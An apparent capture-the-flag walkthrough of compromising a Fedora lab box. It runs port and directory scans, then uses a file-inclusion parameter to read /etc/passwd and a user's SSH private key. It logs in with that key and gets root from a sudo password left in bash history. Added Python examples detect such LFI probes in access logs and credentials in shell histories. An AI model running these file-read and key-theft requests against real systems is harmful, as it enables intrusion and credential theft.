netdiscover

192.168.0.24
rustscan
rustscan -a 192.168.0.24 --ulimit 10000

Ports 80, 443 and 9090 are interesting.
Port 9090

A login page.
Fedora server
Port 443

Simple CMS 2.2.15

There is an exploit on this version:
https://www.exploit-db.com/exploits/49345
gobuster
gobuster dir -u http://192.168.0.27 -w Documents/wordlist/directory-list-2.3-medium.txt -x php --wildcard

- Admin login page
http://192.168.0.27/admin/login.php
Users
- qiu
Infos
They have a problem with a backdoor.


LFI

https://book.hacktricks.xyz/pentesting-web/file-inclusion
http://192.168.0.27/test.php?file=/etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:65534:65534:Kernel Overflow User:/:/sbin/nologin
systemd-coredump:x:999:996:systemd Core Dumper:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:998:995:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
cockpit-ws:x:997:993:User for cockpit-ws:/:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
chrony:x:996:991::/var/lib/chrony:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
qiu:x:1000:1000:qiu:/home/qiu:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
nginx:x:995:990:Nginx web server:/var/lib/nginx:/sbin/nologin
tss:x:59:59:Account used by the tpm2-abrmd package to sandbox the tpm2-abrmd daemon:/dev/null:/sbin/nologin
clevis:x:994:989:Clevis Decryption Framework unprivileged user:/var/cache/clevis:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false
The user qiu also exists on the system.
I can access his home directory:
http://192.168.0.27/test.php?file=/home/qiu/.bashrc
# .bashrc

# Source global definitions
if [ -f /etc/bashrc ]; then
    . /etc/bashrc
fi

# Uncomment the following line if you don't like systemctl's auto-paging feature:
# export SYSTEMD_PAGER=

# User specific aliases and functions
id_rsa key
http://192.168.0.27/test.php?file=/home/qiu/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----

wget 'http://192.168.0.27/test.php?file=/home/qiu/.ssh/id_rsa' -O id_rsa
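From the defender's side, every request in this LFI section leaves a trace in the web server access log. The following is an added example, not part of the original writeup: a small Python scanner over combined-format log lines (the sample lines are constructed to mirror the requests above; the client IP, timestamps and sizes are made up) that flags include-style parameters carrying a traversal sequence, an absolute path, or a well-known sensitive file. The parameter names in FILE_PARAMS and the SENSITIVE list are assumptions to be tuned for the application being monitored.

```python
"""Flag file-inclusion probes in web server access logs.

Added example for this writeup, not part of the original post. Scans
Apache/nginx combined-format lines for a `file=` style parameter whose
value points at an absolute path, a traversal sequence, or a sensitive file.
"""
from __future__ import annotations

import re
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample log lines; request paths mirror the writeup, the rest is made up.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /test.php?file=about HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /test.php?file=/etc/passwd HTTP/1.1" 200 2048
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /test.php?file=/home/qiu/.ssh/id_rsa HTTP/1.1" 200 2610
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /test.php?file=..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1" 403 199
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php HTTP/1.1" 200 1337
"""

# Assumed parameter names that commonly carry a file name in include-style endpoints.
FILE_PARAMS = {"file", "page", "include", "path", "template", "doc"}

# Assumed list of paths whose disclosure is a clear sign of a successful probe.
SENSITIVE = ("/etc/passwd", "/etc/shadow", "/.ssh/", ".bash_history", "/proc/self")

# Combined log format: ip ident user [timestamp] "METHOD target PROTO" status ...
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def suspicious_value(value: str) -> Optional[str]:
    """Return a reason if a parameter value looks like an LFI probe, else None."""
    decoded = unquote(unquote(value))  # also catches double-encoded traversal
    if "../" in decoded or "..\\" in decoded:
        return "path traversal"
    if any(marker in decoded for marker in SENSITIVE):
        return "sensitive file"
    if decoded.startswith("/"):
        return "absolute path"
    if "\x00" in decoded:
        return "null byte"
    return None


def scan_log(text: str) -> list[dict]:
    """Parse each log line and collect findings for include-style parameters."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand
        query = urlsplit(m["target"]).query
        for name, values in parse_qs(query, keep_blank_values=True).items():
            if name.lower() not in FILE_PARAMS:
                continue
            for v in values:
                reason = suspicious_value(v)
                if reason:
                    findings.append({
                        "ip": m["ip"], "status": int(m["status"]),
                        "param": name, "value": v, "reason": reason,
                    })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['status']} {f['param']}={f['value']!r}: {f['reason']}")
```

A 200 status on a flagged request (as for /etc/passwd and the id_rsa read above) is the signal that the inclusion actually succeeded; a 403 shows the probe was attempted but blocked.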
ssh
ssh qiu@192.168.0.27 -i id_rsa

I’m in :D

It’s too late now.
Let’s see what is in the bash history.

echo "remarkablyawesomE" | sudo -S dnf update

I’m root.
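The root step works only because a password was typed on the command line and survived in ~/.bash_history. As an added example (not part of the original writeup), here is a Python audit of shell history lines for commands that embed credentials, so a leaked secret can be found and rotated. The history lines are constructed (the first mirrors the one found above); the patterns cover the `echo ... | sudo -S` form plus sshpass, mysql and curl inline passwords, and the findings are returned with the secret redacted.

```python
"""Audit shell history for commands that embed credentials.

Added example for this writeup, not part of the original post. Flags history
lines that carry a password on the command line and returns them redacted.
"""
import re
from typing import List, Tuple

# Constructed sample history; the first command mirrors the writeup, the rest are made up.
SAMPLE_HISTORY = """\
ls -la
echo "remarkablyawesomE" | sudo -S dnf update
sshpass -p 'Hunter2' ssh admin@10.0.0.9
mysql -u root -pS3cret -e 'show databases'
curl -u deploy:t0ps3cret https://repo.internal/artifact.tgz
git status
"""

# Each pattern captures the secret in a group named `secret`.
PATTERNS = [
    ("password piped to sudo -S",
     re.compile(r"""echo\s+['"]?(?P<secret>[^'"|]+?)['"]?\s*\|\s*sudo\s+-S""")),
    ("sshpass -p on the command line",
     re.compile(r"""sshpass\s+-p\s*['"]?(?P<secret>[^'"\s]+)""")),
    ("mysql -p with inline password",
     re.compile(r"""mysql\b.*\s-p(?P<secret>\S+)""")),
    ("curl -u user:password",
     re.compile(r"""curl\b.*\s-u\s+[^\s:]+:(?P<secret>\S+)""")),
]


def redact(line: str, match: "re.Match[str]") -> str:
    """Replace the captured secret with asterisks so findings can be logged safely."""
    start, end = match.span("secret")
    return line[:start] + "*" * (end - start) + line[end:]


def audit_history(text: str) -> List[Tuple[int, str, str]]:
    """Return (line number, pattern label, redacted line) for each credential leak."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for label, pattern in PATTERNS:
            m = pattern.search(line)
            if m:
                findings.append((lineno, label, redact(line, m)))
                break  # one finding per line is enough
    return findings


if __name__ == "__main__":
    for lineno, label, redacted in audit_history(SAMPLE_HISTORY):
        print(f"line {lineno}: {label}: {redacted}")
```

Run it over ~/.bash_history of each interactive user; any hit means the secret should be rotated, since the history file is readable by anyone who lands in that account, as this box shows.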
